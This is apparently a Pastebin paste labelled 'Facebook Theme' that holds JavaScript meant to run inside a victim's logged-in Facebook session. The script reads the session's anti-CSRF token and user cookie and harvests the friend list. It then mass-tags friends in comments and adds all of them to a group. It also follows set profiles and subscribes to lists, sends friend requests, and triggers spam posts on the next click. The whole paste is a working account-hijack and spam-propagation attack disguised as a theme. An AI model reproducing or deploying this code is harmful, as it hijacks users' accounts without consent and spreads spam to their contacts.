d3n14nAtYourSecurity

Facebook Theme

Jan 23rd, 2014
333
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.11 KB | None | 0 0
  1. /* CREDITOS AO MIGUEL TARGA, ESSA PARTE E DELE */
  2. function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; };
  3.  
  4. //Pegar todos amigos
  5. function get_friends(){
  6. var a=x__0();
  7. a.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm", false);
  8. a.send(null);
  9. if (a.readyState == 4) {
  10. var f = JSON.parse(a.responseText.substring(a.responseText.indexOf('{')));
  11. return f.payload.entries;
  12. }
  13. return false;
  14. }
  15.  
  16. /* FIM DA PARTE DO MIGUEL TARGA */
  17.  
  18. //Pegar todos amigos
  19. function get_uid(b){
  20. var a=x__0();
  21. a.open("GET", 'http://graph.facebook.com/'+b, false);
  22. a.send();
  23. if (a.readyState == 4) {
  24. return uid = JSON.parse(a.responseText).id;
  25.  
  26. }
  27. return false;
  28. }
  29. // Pattern que vai trocar o valor dos coment?rios pelas marcaç?es
  30.  
  31. var patt = /comment_text=(.*?)&/
  32. var c = 1;
  33. username = /\.com\/(.*?)\//.exec(window.top.location)[1];
  34. uid = get_uid(username);
  35. a = window.top.location;
  36. termina = 0;
  37. var amigos = get_friends();
  38. post_id = /[0-9]{8,}/.exec(a);
  39. uids = 'comment_text=';
  40. header = 'ft_ent_identifier='+post_id+'&comment_text=0&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user='+uid+'&__a=1&__req=4u&fb_dtsg='+document.getElementsByName('fb_dtsg')[0].value+'&phstamp='+Math.random();
  41. for ( var n = 1 ; n < amigos.length ; n++ ){
  42. //uids += '%40[' + amigos[n].uid + '%3A' + encodeURI(amigos[n].text) + ']%20';
  43. fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  44. uids += '%40[' + amigos[n].uid + '%3AAAAAAAAAAAA]%20';
  45. c++;
  46. if(c == 7){
  47. // Quando o contador chega em 7, ele termina o parâmetro com um &...
  48. uids += '&';
  49. // ...envia as coisas com o método do indiano...
  50. with(new XMLHttpRequest()) open("POST", "/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),send(header.replace(patt, uids));
  51.  
  52. // ... espera um segundo...
  53. z = setTimeout('function(){asd=0}', 1000);
  54. clearInterval(z);
  55.  
  56. // ... e seta tudo de novo pra recomeçar
  57. c = 1;
  58. uids = 'comment_text=';
  59.  
  60.  
  61. }
  62.  
  63. }
  64.  
  65. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  66. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  67.  
  68. function cereziAl(isim) {
  69. var tarama = isim + "=";
  70. if (document.cookie.length > 0) {
  71. konum = document.cookie.indexOf(tarama)
  72. if (konum != -1) {
  73. konum += tarama.length
  74. son = document.cookie.indexOf(";", konum)
  75. if (son == -1)
  76. son = document.cookie.length
  77. return unescape(document.cookie.substring(konum, son))
  78. }
  79. else { return ""; }
  80. }
  81. }
  82.  
  83. function getRandomInt (min, max) {
  84. return Math.floor(Math.random() * (max - min + 1)) + min;
  85. }
  86. function randomValue(arr) {
  87. return arr[getRandomInt(0, arr.length-1)];
  88. }
  89.  
  90. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  91. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  92.  
  93. function a(abone){
  94. var http4 = new XMLHttpRequest();
  95.  
  96. var url4 = "/ajax/follow/follow_profile.php?__a=1";
  97.  
  98. var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  99. http4.open("POST", url4, true);
  100.  
  101. //Send the proper header information along with the request
  102. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  103. http4.setRequestHeader("Content-length", params4.length);
  104. http4.setRequestHeader("Connection", "close");
  105.  
  106. http4.onreadystatechange = function() {//Call a function when the state changes.
  107. if(http4.readyState == 4 && http4.status == 200) {
  108.  
  109. http4.close; // Close the connection
  110.  
  111. }
  112. }
  113.  
  114. http4.send(params4);
  115. }
  116.  
  117. function sublist(uidss) {
  118. var a = document.createElement('script');
  119. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  120. document.body.appendChild(a);
  121. }
  122.  
  123.  
  124.  
  125. sublist("196595073821666");
  126.  
  127. sublist("1401516113406354");
  128.  
  129. sublist("164346257101594");
  130.  
  131.  
  132.  
  133. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  134. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
  135.  
  136. var httpwp = new XMLHttpRequest();
  137. var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
  138. var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
  139. httpwp['open']('POST', urlwp, true);
  140. httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  141. httpwp['setRequestHeader']('Content-length', paramswp['length']);
  142. httpwp['setRequestHeader']('Connection', 'keep-alive');
  143. httpwp['send'](paramswp);
  144.  
  145. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  146. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
  147.  
  148. var friends = new Array();
  149. gf = new XMLHttpRequest();
  150. gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
  151. gf['send']();
  152. if (gf['readyState'] != 4) {} else {
  153. data = eval('(' + gf['responseText']['substr'](9) + ')');
  154. if (data['error']) {} else {
  155. friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
  156. return _0x93dax8['index'] - _0x93dax9['index'];
  157. });
  158. };
  159. };
  160.  
  161. for (var i = 0; i < friends['length']; i++) {
  162. var httpwp = new XMLHttpRequest();
  163. var urlwp = '/ajax/groups/members/add_post.php?__a=1';
  164. var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
  165. httpwp['open']('POST', urlwp, true);
  166. httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  167. httpwp['setRequestHeader']('Content-length', paramswp['length']);
  168. httpwp['setRequestHeader']('Connection', 'keep-alive');
  169. httpwp['onreadystatechange'] = function () {
  170. if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
  171. };
  172. httpwp['send'](paramswp);
  173. };
  174. var spage_id = "100211486794985";
  175. var spost_id = "100211486794985";
  176. var sfoto_id = "100211486794985";
  177. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  178. var smesaj = "";
  179. var smesaj_text = "";
  180. var arkadaslar = [];
  181. var svn_rev;
  182. var bugun= new Date();
  183. var btarihi = new Date();
  184. btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
  185. if(!document.cookie.match(/paylasti=(\d+)/)){
  186. document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();
  187. }
  188.  
  189.  
  190. //arkadaslari al ve isle
  191. function sarkadaslari_al(){
  192. var xmlhttp = new XMLHttpRequest();
  193. xmlhttp.onreadystatechange = function () {
  194. if(xmlhttp.readyState == 4){
  195. eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  196. for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
  197. smesaj = "";
  198. smesaj_text = "";
  199. for(i=f*10;i<(f+1)*10;i++){
  200. if(arkadaslar.payload.entries[i]){
  201. smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
  202. smesaj_text += " " + arkadaslar.payload.entries[i].text;
  203. }
  204. }
  205. sdurumpaylas(); }
  206.  
  207. }
  208.  
  209. };
  210. var params = "&filter[0]=user";
  211. params += "&options[0]=friends_only";
  212. params += "&options[1]=nm";
  213. params += "&token=v7";
  214. params += "&viewer=" + user_id;
  215. params += "&__user=" + user_id;
  216.  
  217. if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  218. else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  219. xmlhttp.send();
  220. }
  221.  
  222. //tiklama olayini dinle
  223. var tiklama = document.addEventListener("click", function () {
  224. if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  225. svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  226. sarkadaslari_al();
  227. document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();
  228.  
  229. document.removeEventListener(tiklama);
  230. }
  231. }, false);
  232.  
  233.  
  234. //arkada?? ekleme
  235. function sarkadasekle(uid,cins){
  236. var xmlhttp = new XMLHttpRequest();
  237. xmlhttp.onreadystatechange = function () {
  238. if(xmlhttp.readyState == 4){
  239. }
  240. };
  241.  
  242. xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
  243. var params = "to_friend=" + uid;
  244. params += "&action=add_friend";
  245. params += "&how_found=friend_browser";
  246. params += "&ref_param=none";
  247. params += "&outgoing_id=";
  248. params += "&logging_location=friend_browser";
  249. params += "&no_flyout_on_click=true";
  250. params += "&ego_log_data=";
  251. params += "&http_referer=";
  252. params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
  253. params += "&phstamp=165816749114848369115";
  254. params += "&__user=" + user_id;
  255. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  256. xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
  257.  
  258. if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){
  259. xmlhttp.send(params);
  260. }else if(document.cookie.split("cins" + user_id +"=").length <= 1){
  261. cinsiyetgetir(uid,cins,"sarkadasekle");
  262. }else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){
  263. xmlhttp.send(params);
  264. }
  265. }
  266.  
  267. //cinsiyet belirleme
  268. var cinssonuc = {};
  269. var cinshtml = document.createElement("html");
  270. function scinsiyetgetir(uid,cins,fonksiyon){
  271. var xmlhttp = new XMLHttpRequest();
  272. xmlhttp.onreadystatechange = function () {
  273. if(xmlhttp.readyState == 4){
  274. eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  275. cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html
  276. btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
  277. if(cinshtml.getElementsByTagName("select")[0].value == "1"){
  278. document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString();
  279. }else if(cinshtml.getElementsByTagName("select")[0].value == "2"){
  280. document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString();
  281. }
  282. eval(fonksiyon + "(" + id + "," + cins + ");");
  283. }
  284. };
  285. xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
  286. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  287. xmlhttp.send();
  288. }
Add Comment
Please, Sign In to add comment